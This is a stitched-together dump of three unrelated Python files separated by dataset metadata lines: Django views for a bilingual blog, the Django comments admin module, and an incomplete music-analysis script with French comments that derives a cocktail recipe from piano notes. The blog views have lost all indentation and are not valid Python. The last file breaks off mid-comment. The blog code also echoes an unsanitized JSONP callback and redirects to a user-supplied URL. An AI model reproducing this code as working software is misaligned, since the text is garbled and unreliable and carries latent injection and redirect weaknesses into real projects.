categories = memcache.get('categories-'+lang)
if categories is None:
categories = Category.objects.all().order_by('order')
memcache.set('categories-'+lang, list(categories), 300)
paginator = Paginator(categories, PAGE_SIZE)
categories = paginator.page(1)
return render_to_response('home/index.html', {"categories":categories, "lang":lang}, context_instance=RequestContext(request))
def set_redirect(lang="vi", type_redirect_page=None, post=None, category=None):
redirect = "/"
if type_redirect_page == "xem_nhieu" and lang == "vi":
return "/most-view/"
elif type_redirect_page == "xem_nhieu" and lang == "en":
return "/xem-nhieu/"
elif type_redirect_page == "binh_luan_nhieu" and lang == "en":
return "/binh-luan-nhieu/"
elif type_redirect_page == "binh_luan_nhieu" and lang == "vi":
return "/most-comment/"
elif type_redirect_page == "detail" and lang == "en":
return "/"+post.category.slug+"/"+post.slug+"/"
elif type_redirect_page == "detail" and lang == "vi":
return "/"+post.category.slug_en+"/"+post.slug_en+"/"
elif type_redirect_page == "category" and lang == "en":
return "/"+category.slug+"/"
elif type_redirect_page == "category" and lang == "vi":
return "/"+category.slug_en+"/"
else:
return redirect
def get_posts(request):
if request.method == 'POST':
category = None
posts_list = None
page = request.POST.get('page')
if "category" in request.POST:
category = request.POST["category"]
cate= get_object_or_404(Category,slug=category)
posts_list = memcache.get('categories-%s' % category)
if posts_list is None:
posts_list = POST.objects.filter(category=cate).order_by('-date')
memcache.set('categories-%s' % category, list(posts_list), 300)
paginator = Paginator(posts_list, PAGE_SIZE)
try:
posts = paginator.page(page)
except PageNotAnInteger:
return HttpResponse(status=400)
data = {"posts":posts}
if category is not None:
data["cate_current"] = category
html = render_to_string("post/post_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
return HttpResponse(status=400)
def get_categories(request):
if request.method == 'POST':
cate_list = None
page = request.POST.get('page')
try:
cate_list = memcache.get('categories')
if cate_list is None:
cate_list = Category.objects.all().order_by('order')
memcache.set('categories', cate_list, 300)
except:
cate_list = Category.objects.all().order_by('order')
paginator = Paginator(cate_list, PAGE_SIZE)
try:
categories = paginator.page(page)
except PageNotAnInteger:
return HttpResponse(status=400)
data = {"categories":categories}
html = render_to_string("category/category_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
return HttpResponse(status=400)
def get_posts_detail_more(request):
if request.method == 'POST':
page = request.POST.get('page')
typeGet = request.POST.get('type')
category = request.POST["category"]
cate= get_object_or_404(Category,slug=category)
oldcookie = MultiCookie(cookie=request.COOKIES.get('viewed_post'))
list_viewed = oldcookie.values
if list_viewed is None:
list_viewed = []
if "viewed" == typeGet:
posts_list = POST.objects.filter(pk__in=list_viewed,category=cate).order_by('-date')
else:
posts_list = POST.objects.filter(~Q(pk__in=list_viewed),category=cate).order_by('-date')
paginator = Paginator(posts_list, PAGE_SIZE)
try:
posts = paginator.page(page)
except PageNotAnInteger:
return HttpResponse(status=400)
data = {"posts":posts, "type":typeGet, "lang":request.LANGUAGE_CODE}
if category is not None:
data["cate_current"] = category
html = render_to_string("post/more_post_detail.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
return HttpResponse(status=400)
@cache_page(60 * 4)
def detail_post(request, category=None, slug=None):
post = get_object_or_404(POST, slug=slug)
post.updateView()
oldcookie = MultiCookie(cookie=request.COOKIES.get('viewed_post'))
list_viewed = oldcookie.values
if list_viewed is None:
list_viewed = [post.id]
else:
if exits_in_array(list_viewed, post.id) == False:
list_viewed.append(post.id)
categories = Category.objects.all().order_by('order')
response = render_to_response('home/detail.html', {"post":post,"categories":categories}, context_instance=RequestContext(request))
newcookie = MultiCookie(values=list_viewed)
response.set_cookie('viewed_post',value=newcookie)
return response
@cache_page(60 * 15)
def category(request, category=None):
cate= get_object_or_404(Category,slug=category)
posts_list = memcache.get(category)
if posts_list is None:
posts_list = POST.objects.filter(category=cate).order_by('-date')
memcache.set(category, list(posts_list), 300)
paginator = Paginator(posts_list, PAGE_SIZE)
posts = paginator.page(1)
return render_to_response('home/category_page.html', {"posts":posts,"cate_current":cate}, context_instance=RequestContext(request))
def get_array_field(dict_list, field):
arr_return = []
for item in dict_list:
arr_return.append(getattr(item, field))
return arr_return
def exits_in_array(dict_list, ele):
for item in dict_list:
if item == ele:
return True
return False
def category_post_relative(request, category=None):
post=request.GET["post"]
oldcookie = MultiCookie(cookie=request.COOKIES.get('viewed_post'))
list_viewed = oldcookie.values
if list_viewed is None:
list_viewed = []
if request.LANGUAGE_CODE == "vi":
cate= get_object_or_404(Category,slug=category)
else:
cate= get_object_or_404(Category,slug_en=category)
posts_list_not_view = POST.objects.filter(~Q(pk__in=list_viewed),category=cate).order_by('-date')
posts_list__viewed = POST.objects.filter(pk__in=list_viewed,category=cate).order_by('-date')
paginator = Paginator(posts_list_not_view, PAGE_SIZE)
posts_not_view = paginator.page(1)
paginator_viewed = Paginator(posts_list__viewed, PAGE_SIZE)
posts_viewed = paginator_viewed.page(1)
data = {"posts_not_view":posts_not_view, "posts_viewed":posts_viewed, "cate_current":category, "lang":request.LANGUAGE_CODE}
html = render_to_string("post/post_relative_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
@login_required
def upload_image(request):
upload_files = get_uploads(request, field_name='file', populate_post=True) # 'file' is file upload field in the form
blob_info = upload_files[0]
image = IMAGE_STORE()
image.blob_key = blob_info.key()
image.created_date = blob_info.creation
image.size = blob_info.size
image.file_name = blob_info.filename
image.save()
return redirect(request.POST["redirect"])
def get_uploads(request, field_name=None, populate_post=False):
"""Get uploads sent to this handler.
Args:
field_name: Only select uploads that were sent as a specific field.
populate_post: Add the non blob fields to request.POST
Returns:
A list of BlobInfo records corresponding to each upload.
Empty list if there are no blob-info records for field_name.
"""
if hasattr(request,'__uploads') == False:
request.META['wsgi.input'].seek(0)
fields = cgi.FieldStorage(request.META['wsgi.input'], environ=request.META)
request.__uploads = {}
if populate_post:
request.POST = {}
for key in fields.keys():
field = fields[key]
if isinstance(field, cgi.FieldStorage) and 'blob-key' in field.type_options:
request.__uploads.setdefault(key, []).append(blobstore.parse_blob_info(field))
elif populate_post:
request.POST[key] = field.value
if field_name:
try:
return list(request.__uploads[field_name])
except KeyError:
return []
else:
results = []
for uploads in request.__uploads.itervalues():
results += uploads
return results
@login_required
def get_images(request):
images_list = IMAGE_STORE.objects.all().order_by('-created_date')
paginator = Paginator(images_list, PAGE_SIZE)
imagesPage = paginator.page(1)
urls = []
for blob in imagesPage:
urls.append(images.get_serving_url(blob.blob_key))
data = {"urls" : urls, "images":imagesPage}
html = render_to_string("image/image_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
@login_required
def get_images_more(request):
if request.method == 'POST':
page = request.POST.get('page')
images_list = IMAGE_STORE.objects.all().order_by('-created_date')
paginator = Paginator(images_list, PAGE_SIZE)
try:
imagesPage = paginator.page(page)
except PageNotAnInteger:
return HttpResponse(status=400)
urls = []
for blob in imagesPage:
urls.append(images.get_serving_url(blob.blob_key))
data = {"urls" : urls, "images":imagesPage}
html = render_to_string("image/image_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
return HttpResponse(status=400)
def commented(request):
if request.method == "POST":
post = get_object_or_404(POST, pk=request.POST["p"])
if "type" in request.POST:
post.updateComment("removed")
else:
post.updateComment()
return HttpResponse(status=200)
return HttpResponse(status=400)
def liked(request):
if request.method == "POST":
post = get_object_or_404(POST, pk=request.POST["p"])
if "type" in request.POST:
post.updateLike("unliked")
else:
post.updateLike()
return HttpResponse(status=200)
return HttpResponse(status=400)
def search(request):
""" Autocomplete search for Venue and Player API
:param request:
"""
key = u'%s' % request.GET['q']
callback = request.GET.get('callback')
cates = Category.objects.all().filter(Q(name__icontains=key))[:10]
dictionaries = [ obj.as_dict() for obj in cates ]
serialized_data = json.dumps(dictionaries)
data = '%s(%s)' % (callback, serialized_data)
return HttpResponse(data, mimetype='application/json') | bsd-3-clause | 4,577,825,283,039,295,000 | 33.688073 | 132 | 0.705784 | false |
adieu/django-nonrel | django/contrib/comments/admin.py | 361 | 3299 | from django.contrib import admin
from django.contrib.comments.models import Comment
from django.utils.translation import ugettext_lazy as _, ungettext
from django.contrib.comments import get_model
from django.contrib.comments.views.moderation import perform_flag, perform_approve, perform_delete
class CommentsAdmin(admin.ModelAdmin):
fieldsets = (
(None,
{'fields': ('content_type', 'object_pk', 'site')}
),
(_('Content'),
{'fields': ('user', 'user_name', 'user_email', 'user_url', 'comment')}
),
(_('Metadata'),
{'fields': ('submit_date', 'ip_address', 'is_public', 'is_removed')}
),
)
list_display = ('name', 'content_type', 'object_pk', 'ip_address', 'submit_date', 'is_public', 'is_removed')
list_filter = ('submit_date', 'site', 'is_public', 'is_removed')
date_hierarchy = 'submit_date'
ordering = ('-submit_date',)
raw_id_fields = ('user',)
search_fields = ('comment', 'user__username', 'user_name', 'user_email', 'user_url', 'ip_address')
actions = ["flag_comments", "approve_comments", "remove_comments"]
def get_actions(self, request):
actions = super(CommentsAdmin, self).get_actions(request)
# Only superusers should be able to delete the comments from the DB.
if not request.user.is_superuser and 'delete_selected' in actions:
actions.pop('delete_selected')
if not request.user.has_perm('comments.can_moderate'):
if 'approve_comments' in actions:
actions.pop('approve_comments')
if 'remove_comments' in actions:
actions.pop('remove_comments')
return actions
def flag_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_flag,
lambda n: ungettext('flagged', 'flagged', n))
flag_comments.short_description = _("Flag selected comments")
def approve_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_approve,
lambda n: ungettext('approved', 'approved', n))
approve_comments.short_description = _("Approve selected comments")
def remove_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_delete,
lambda n: ungettext('removed', 'removed', n))
remove_comments.short_description = _("Remove selected comments")
def _bulk_flag(self, request, queryset, action, done_message):
"""
Flag, approve, or remove some comments from an admin action. Actually
calls the `action` argument to perform the heavy lifting.
"""
n_comments = 0
for comment in queryset:
action(request, comment)
n_comments += 1
msg = ungettext(u'1 comment was successfully %(action)s.',
u'%(count)s comments were successfully %(action)s.',
n_comments)
self.message_user(request, msg % {'count': n_comments, 'action': done_message(n_comments)})
# Only register the default admin if the model is the built-in comment model
# (this won't be true if there's a custom comment app).
if get_model() is Comment:
admin.site.register(Comment, CommentsAdmin)
| bsd-3-clause | -6,407,621,922,310,696,000 | 44.191781 | 112 | 0.62231 | false |
bverdu/Pyanocktail | pyanocktail/pyanalysis.py | 1 | 31981 | # -*- coding: utf-8 -*-
# This software is free software; you can redistribute it and/or modify it under
# the terms of version 2 of GNU General Public License as published by the
# Free Software Foundation (see License.txt).
from __future__ import division
import numpy as np
# Note FJ :
# format des fichiers pckt :
# je crois qu'on a
# colonne 0 : temps de l'évènement (en ms)
# colonne 1 : type dévènement (0 note off, 1 note on, 5 sustain on ou off)
# colonne 2 : hauteur de la note
# colonne 3 : intensité de la note
def arggsort(data):
# Il n'y a pas d'équivalent direct à la fonction gsort de scilab dans numpy
# gsort ordonne les résultats du plus grand au plus petit, en imposant en plus
# de conserver l'ordre des indices pour les valeurs identiques
# on recupère les valeurs ordonnées du plus grand au plus petit
ordered_data = np.sort(data)[::-1]
# on récupère les indices correspondants
indexes = np.argsort(data)[::-1]
# il est maintenant nécessaire de faire une boucle pour réordonner les indices
# pour les valeurs identiques
# début de la plage (inclus) pour laquel les valeurs ordonnées sont
# identiques
ind_start = 0
# fin de la plage (exclus) pour laquel les valeurs ordonnées sont
# identiques
ind_stop = 1
for ind in range(1, indexes.shape[0]):
if ordered_data[ind] == ordered_data[ind - 1]:
ind_stop += 1
else:
indexes[ind_start:ind_stop] = np.sort(indexes[ind_start:ind_stop])
ind_start = ind_stop
ind_stop += 1
indexes[ind_start:ind_stop] = np.sort(indexes[ind_start:ind_stop])
return indexes
def PIANOCKTAIL(notes):
######################################
# Ouverture des fichiers - Liste des ON / OFF / SUSTAIN
######################################
# piano = np.loadtxt(fname)
if isinstance(notes, list):
piano = np.array(notes)
else:
piano = np.loadtxt(notes)
l = piano.shape[0]
# Liste des ON / OFF / SUSTAIN
M_On = piano[piano[:, 1] == 1, :]
nbnotes_piece = M_On.shape[0]
M_Off = piano[piano[:, 1] == 0, :]
nbnoff_piece = M_Off.shape[0]
M_Sust = piano[piano[:, 1] == 5, :]
nbsust_piece = M_Sust.shape[0]
# Conversion des instants millisecondes -> secondes
M_On[:, 0] = M_On[:, 0] / 1000.
M_Off[:, 0] = M_Off[:, 0] / 1000.
M_Sust[:, 0] = M_Sust[:, 0] / 1000.
######################################
# Verif des sustains: si nombre impair, off a la fin du morceau
######################################
# !!! FJ : attention, je n'ai aucun fichier de test avec des données de
# sustain, tout ce qui concerne le sustain n'a donc pas été testé
if nbsust_piece % 2 != 0:
M_Sust = np.vstack([M_Sust, [np.max(M_Off[:, 0]), 5., 0., 0.]])
nbsust_piece = M_Sust.shape[0]
# Separation des sustains On / Off
Sust_On = M_Sust[0::2, :]
Sust_Off = M_Sust[1::2, :]
######################################
# Determination de la fin des notes
######################################
for i in np.arange(nbnotes_piece):
j = 0
while ((M_Off[j, 2] != M_On[i, 2]) or (M_Off[j, 0] < M_On[i, 0])) \
and (j < nbnoff_piece - 1):
j += 1
M_On[i, 1] = M_Off[j, 0]
M_Off[j, 2] = 0.
del M_Off
del piano
note_piece = np.zeros([nbnotes_piece, 7])
note_piece[:, 3] = M_On[:, 2]
note_piece[:, 4] = M_On[:, 3]
note_piece[:, 5] = M_On[:, 0]
note_piece[:, 6] = M_On[:, 1] - M_On[:, 0]
del M_On
size_piece = note_piece.shape
nbnotes_piece = size_piece[0]
# Duration of the piece in seconds:
t_piece = np.max(note_piece[:, 5])
duree = t_piece
# Density of notes (notes/seconds):
densite = nbnotes_piece / t_piece
# Attaques:
# !!! FJ : Il manque pas un indice à note_piece dans np.mean(note_piece))^(1/3) ?
# OUI : ajouter [:,4]
# !!! FJ : scilab renvoie 0 pour stdev lorsqu'on lui passe une seule valeur
# (ie il y a une seule note dans le morceau), numpy renvoie nan
# -> j'ajoute un test
if note_piece.shape[0] == 1:
Enervement = np.mean(note_piece[:, 4]) * 0.1**(1. / 3.) * 1.1
else:
Enervement = np.mean(note_piece[:, 4]) * \
(0.1 + 1.0 * (np.std(note_piece[:, 4], ddof=1)) / np.mean(note_piece[:, 4]))**(1. / 3.) \
* 1.1
metrique = METRIQUE(note_piece)
tonalite = TONALITE(note_piece)
tempo = TEMPO(note_piece)
# Complexite:
# !!! FJ : C'est normal le commentaire à la fin ?
# OUI c'est normal
Complexite = (densite * 60 / tempo)**1.2 # *densite**0.3
# Tristesse du morceau
# 45 points pour le tempo et bonus de 40 si tonalite mineure, bonus de 15 si binaire
# !!! FJ : pourquoi il y a un max là ?
# OUI c'est normal !!!
tristesse = max(45 * (1 - tempo / 150) + 40 *
np.floor(tonalite / 13.), 0) + 15 * (1 - np.floor(metrique / 3.))
cocktail = RECETTE(duree, Complexite, tonalite, tempo)
return (duree, tristesse, Enervement, Complexite, metrique, tonalite, tempo, cocktail)
def RECETTE(duree, complexite, tonalite, tempo):
# Ici on détermine quoi mettre dans le verre !
crit_duree = [0., 10., 30., 90., 180.]
crit_tempo = [50, 80, 120]
alcfort = ['alc01 ', 'alc02 ', 'alc03 ', 'alc04 ', 'alc05 ', 'alc06 ',
'alc07 ', 'alc08 ', 'alc09 ', 'alc10 ', 'alc11 ', 'alc12 ']
sodamaj = ['sj1 ', 'sj2 ', 'sj3 ', 'sj4 ']
sodamin = ['sn1 ', 'sn2 ', 'sn3 ', 'sn4 ']
complicado = ['tralala ']
recette = []
# CHOIX DE L'ALCOOL FORT (Tonalite)
recette.append(alcfort[(tonalite - 1) % 12])
# DOSAGE DE L'ALCOOL FORT (Duree du morceau)
# !!! FJ : il faudrait récrire ces boucles de manière plus générique
# avec des opérations sur les tableaux directement
if ((crit_duree[0] < duree) and (duree <= crit_duree[1])):
recette.append('0 ')
elif ((crit_duree[1] < duree) and (duree <= crit_duree[2])):
recette.append('1 ')
elif ((crit_duree[2] < duree) and (duree <= crit_duree[3])):
recette.append('2 ')
elif ((crit_duree[3] < duree) and (duree <= crit_duree[4])):
recette.append('3 ')
elif (duree > crit_duree[4]):
recette.append('4 ')
# DETERMINATION DU SODA
# Pre-decoupage de la liste de sodas: majeur - mineur
# !!! FJ il faudrait vérifier comment est codée la tonalité, mais si les
# valeurs 1 à 12 sont en majeur, là il y a une erreur car 12 est reconnu
# comme mineur, et est-ce que le else est censé arriver ?
# OUI, c'est à corriger -> J'ai remplacé tonalite par tonalite-1
# bug_6.pckt permet de tomber sur un cas où la tonalité vaut 24, ce qui
# provoquait un problème avec le code non corrigé
if np.floor((tonalite - 1) / 12.) == 0.:
soda = sodamaj
elif np.floor((tonalite - 1) / 12.) == 1.:
soda = sodamin
else:
soda = []
# DETERMINATION DU SODA
# Choix du soda proprement dit
if (tempo < crit_tempo[0]):
recette.append(soda[0])
recette.append('3 ')
elif ((crit_tempo[0] < tempo) and (tempo <= crit_tempo[1])):
recette.append(soda[1])
recette.append('3 ')
elif ((crit_tempo[1] < tempo) and (tempo <= crit_tempo[2])):
recette.append(soda[2])
recette.append('3 ')
elif ((crit_tempo[2] < tempo)):
recette.append(soda[3])
recette.append('3 ')
# LA PETITE TOUCHE DE VIRTUOSITE - C'EST PEUT-ETRE BON
if complexite > 0.7:
recette.append(complicado[0])
recette.append('1 ')
recette1 = ''.join(recette)
return recette1
def TONALITE(note_piece):
size_piece = note_piece.shape
nbnotes_piece = size_piece[0]
####################################################
# ESTIMATION DE LA TONALITE
####################################################
#
# Tonalité:
# key_piece = kkkey(note_piece)
# Key of NMAT according to the Krumhansl-Kessler algorithm
# k = kkkey(nmat)
# Returns the key of NMAT according to the Krumhansl-Kessler algorithm.
#
# Input argument:
# NOTE_PIECE = notematrix
#
# Output:
# K = estimated key of NMAT encoded as a number
# encoding: C major = 1, C# major = 2, ...
# c minor = 13, c# minor = 14, ...
#
# Remarks:
#
# See also KEYMODE, KKMAX, and KKCC.
#
# Example:
#
# Reference:
# Krumhansl, C. L. (1990). Cognitive Foundations of Musical Pitch.
# New York: Oxford University Press.
#
# Author Date
# P. Toiviainen 8.8.2002
# © Part of the MIDI Toolbox, Copyright © 2004, University of Jyvaskyla, Finland
# See License.txt
# Correlations of pitch-class distribution with Krumhansl-Kessler tonal hierarchies
# c = kkcc(nmat, <opt>)
# Returns the correlations of the pitch class distribution PCDIST1
# of NMAT with each of the 24 Krumhansl-Kessler profiles.
#
# Input arguments:
# NMAT = notematrix
# OPT = OPTIONS (optional), 'SALIENCE' return the correlations of the
# pitch-class distribution according to the Huron & Parncutt (1993)
# key-finding algorithm.
#
# Output:
# C = 24-component vector containing the correlation coeffients
# between the pitch-class distribution of NMAT and each
# of the 24 Krumhansl-Kessler profiles.
#
# Remarks: REFSTAT function is called to load the key profiles.
#
# Example: c = kkcc(nmat, 'salience')
#
# See also KEYMODE, KKMAX, and KKKEY in the MIDI Toolbox.
#
# References:
# Krumhansl, C. L. (1990). Cognitive Foundations of Musical Pitch.
# New York: Oxford University Press.
#
# Huron, D., & Parncutt, R. (1993). An improved model of tonality
# perception incorporating pitch salience and echoic memory.
# Psychomusicology, 12, 152-169.
#
pc = note_piece[:, 3] % 12
tau = 0.5
accent_index = 2
dur = note_piece[:, 6]
dur_acc = (1 - np.exp(-dur / tau))**accent_index
# !!! FJ : il faudrait réécrire pour utiliser pcds sous la forme
# np.zeros(12)
pcds = np.zeros([1, 12])
size_pc = pc.shape[0]
for k in np.arange(size_pc):
pcds[0, int(pc[k])] = pcds[0, int(pc[k])] + dur_acc[k]
pcds = pcds / np.sum(pcds + 1e-12)
kkprofs = np.array([
[0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18],
[0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14],
[0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22],
[0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15],
[0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32],
[0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15],
[0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25],
[0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27],
[0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14],
[0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21],
[0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14],
[0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39],
[0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19],
[0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20],
[0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16],
[0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24],
[0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28],
[0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15],
[0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21],
[0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15],
[0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32],
[0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21],
[0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16],
[0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38]])
tmp_mat = np.vstack([pcds, kkprofs]).transpose()
[n, p] = tmp_mat.shape
covpcds = tmp_mat - np.dot(np.ones([n, p]), np.mean(tmp_mat))
covpcds = np.dot(covpcds.transpose(), covpcds) / (n - 1)
# !!! FJ : c'est normal que ce soit commenté ça ?
# OUI, a priori l'équivalent est codé directement juste au dessus
# covpcds = cov([pcds; kkprofs]'); # SCILAB: corr
c2 = np.zeros(24)
for k in np.arange(1, 25):
c2[k - 1] = covpcds[0, k] / np.sqrt(covpcds[0, 0] * covpcds[k, k])
tonalite = np.argmax(c2) + 1
return tonalite
def TEMPO(note_piece):
# !!! FJ il faudrait réécrire cette fonction en vectoriel (là c'est bouré de
# boucles et bien difficile à lire...)
size_piece = note_piece.shape
nbnotes_piece = size_piece[0]
# !!! FJ : Le cas où une seule est présente fait planter l'algo
# -> il faudra décider comment on gère ce cas, pour l'instant je mets un
# test et je renvoie une valeur arbitraire
if nbnotes_piece == 1:
tempo = 1.
return tempo
####################################################
# ESTIMATION DU TEMPO
####################################################
# Calcul de la fin de chacune des notes (en seconde) et remplacement de la
# colonne "durée en beats"
note_piece[:, 1] = note_piece[:, 5] + note_piece[:, 6]
# DECOMPTE DES EVENEMENTS DISTINCTS (i.e UN ACCORD = UN EVENEMENT)
# Matrice Note_classees :
# Colonne 1: Instant de la frappe (en secondes)
# Colonne 2: Instant de fin de la note (en secondes)
# Colonne 3: Nombre de touches frappées à la fois
Dur_min = np.min(note_piece[:, 6])
tolerance = max(Dur_min / 3, 0.05)
Nb_att = 1
Note_classees = np.zeros([nbnotes_piece, 3])
Note_classees[0, 0] = note_piece[0, 5]
Note_classees[0, 1] = note_piece[0, 1]
# !!! FJ : Il ne manque pas quelque chose pour gérer Note_classees[0, 2] ?
# là ça vaut 0
# OUI, il faut initialiser à 1 pour tenir compte de la note qu'on vient de
# classer
Note_classees[0, 2] = 1
Last_time = note_piece[0, 5]
dtim1 = 0.1
for i in np.arange(1, nbnotes_piece):
dti = note_piece[i, 5] - Last_time
if dti >= tolerance: # Non-simultanéité de 2 notes
Nb_att += 1
Note_classees[Nb_att - 1, 0] = note_piece[i, 5]
Note_classees[Nb_att - 1, 1] = note_piece[i, 1]
Note_classees[Nb_att - 1, 2] = 1
Last_time = note_piece[i, 5]
else: # Simultanéité de 2 notes
Note_classees[Nb_att - 1, 2] += 1
# MARQUAGE / PONDERATION DES EVENEMENTS POUR EN DEDUIRE UN POIDS RYTHMIQUE
Poids_tempo = np.zeros([Nb_att, 6])
Poids_tempo[:, 0] = Note_classees[:Nb_att, 0]
# Marquage Nr1: Valeurs successives d'inter-onsets proches/égales
Poids_tempo[0, 1] = 1 # Initialisation
for i in np.arange(2, Nb_att):
dti = Note_classees[i, 0] - Note_classees[i - 1, 0]
dtim1 = Note_classees[i - 1, 0] - Note_classees[i - 2, 0]
if abs(dtim1 - dti) <= 0.2 * dtim1:
Poids_tempo[i, 1] = 1
# Marquage Nr2: intervalles entre attaques allongés
Poids_tempo[0, 2] = 1 # Initialisation
for i in np.arange(1, Nb_att - 1):
dti = Note_classees[i, 0] - Note_classees[i - 1, 0]
dtip1 = Note_classees[i + 1, 0] - Note_classees[i, 0]
if dtip1 / dti <= 1.2:
Poids_tempo[i, 2] = 1
# Marquage Nr3: Nb de notes par accord
Poids_tempo[:, 3] = Note_classees[:Nb_att, 2] - np.ones(Nb_att)
# Marquage Nr4: Nb d'accords se terminant sur une attaque donnée
dist_time = np.zeros(Nb_att)
for i in np.arange(2, Nb_att):
for j in np.arange(Nb_att):
dist_time[j] = np.abs(Note_classees[j, 1] - Note_classees[i, 0])
marq2 = np.nonzero(dist_time <= tolerance)[0]
l = marq2.shape[0]
if l > 0:
Poids_tempo[i, 4] = l - 1
# !!! FJ : Il vaudrait mieux écrire la ligne ci-dessous sous forme de produit matriciel
Poids_tempo[:, 5] = 1 * Poids_tempo[:, 1] + 1 * Poids_tempo[:,
2] + 2 * Poids_tempo[:, 3] + 2 * Poids_tempo[:, 4]
# GENERATION DE BATTUES POSSIBLES
# Principe: on choisit un évènement
#
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
# TEMPO DE L'ENSEMBLE DU MORCEAU
#
# Initialisation: début de la propagation des battues à partir du 1/12 de
# la durée du morceau
# !!! FJ : je pense qu'il y a un gros bug là dans le code scilab, parce qu'il
# manque un des indices, il utilise la matrice comme un vecteur et trouve des indices très grands
# OK, ma modif est bonne
indices = np.nonzero(Note_classees[:, 0] > (
Note_classees[Nb_att - 1, 0] / 12))[0]
i1 = max(indices[0], 1)
# On vérifie que le point de départ est bien un maximum local de poids
# tempo (borné à 1/6 de la longueur du morceau)
while (i1 < (np.fix(Nb_att / 6.) - 1)) and \
((Poids_tempo[i1 - 1, 5] >= Poids_tempo[i1, 5]) or (Poids_tempo[i1 + 1, 5] >= Poids_tempo[i1, 5])):
i1 += 1
# Initialisation des battues: intervalles de temps entre la valeur de
# départ et toutes les notes jouées jusque là
# !!! FJ : Note_classees(1:(i1-1)) vaut implicitement Note_classees(1:(i1-1),1)), c'est bien ce qu'on veut ?
# Pourquoi ne pas mettre explicitement le deuxième indice ?
# OK, ma modif est bonne, comme ça marchait Tom n'a pas repéré ("wild
# programming")
battuesav = Note_classees[i1, 0] - Note_classees[:i1, 0]
# !!! FJ : sur le fichier bug_4.pckt, ici battuesap vaut [] et je ne sais
# pas si c'est correct
battuesap = Note_classees[int((
i1 + 1)):int((i1 + 2 + np.fix(Nb_att / 6))), 0] - Note_classees[i1, 0]
#!!! FJ : Pourquoi indiquer les indices dans battues qui n'existe pas encore ?
# OK, Tom savait pas que c'était pas nécessaire
# battues[0:i1+np.fix(Nb_att/6)] = np.vstack([battuesav, battuesap])
battues = np.hstack([battuesav, battuesap])
# Elimination des battues de plus de 1.3 secondes
# !!! FJ : il va falloir adapter des choses là -> notamment à passer en vectoriel
# Modif FJ : dans certains cas, on a un plantage parce que battues ne contient aucune
# battue inférieure à 1.3 -> pour éviter le plantage, on prend le minimum des battues
# disponibles dans ce cas
if battues.min() < 1.3:
ind_battues = np.nonzero(battues < 1.3)[0]
else:
ind_battues = np.nonzero(battues == battues.min())[0]
Nb_battues = ind_battues.shape[0]
liste_battues = np.zeros([Nb_battues, 3])
for i in np.arange(Nb_battues):
k = ind_battues[i]
liste_battues[i, 0] = battues[k]
# !!! FJ : scilab fait le tri à l'envers (du plus grand au plus petit,
# je dois ajouter [::-1] pour inverser l'ordre des résultats
liste_battues[:, 0] = np.sort(liste_battues[:, 0])[::-1]
for i in np.arange(Nb_battues):
i2 = i1
# Critere pour la propagation d'une battue:
crit_dist = max(0.1 * liste_battues[i, 0], 2 * tolerance)
# Recherche de la frappe la plus proche
ind_max = min(
i2 + np.floor(liste_battues[i, 0] / tolerance) + 1, Nb_att - 2)
# !!! FJ : Dans le cas limite ou i2 = ind_max (cf fichier bug_1.pckt,
# on a une expression de la forme [] - un truc, et le comportement par
# défaut dans ce cas est différent entre scilab et Python -> il faut
# gérer à part ce cas.
# Le code original :
